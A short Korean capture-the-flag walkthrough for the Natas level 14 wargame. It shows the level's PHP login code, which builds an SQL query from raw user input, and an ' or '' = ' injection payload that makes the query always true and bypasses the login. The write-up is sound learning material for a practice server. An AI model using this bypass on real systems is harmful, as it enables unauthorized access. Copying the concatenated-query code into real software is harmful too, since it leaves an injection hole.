로그인 창이 주어진다. 로그인 부분의 PHP 소스는 다음과 같다:

<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
   
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>

다음의 쿼리를 실행한다:

SELECT * from users where username= "ID입력값" and password="PW입력값"

위 쿼리에서 1개 이상의 결과가 반환되면 natas15의 비밀번호를 알려준다.

간단히 ID와 PW에 " or "" = " 값을 넣으면 모든 조건이 참이 되므로 우회할 수 있다:

SELECT * from users where username= "" or "" = "" and password="" or "" = ""

(username이 공백인 경우 / 공백이 공백인 경우(무조건 참인 조건))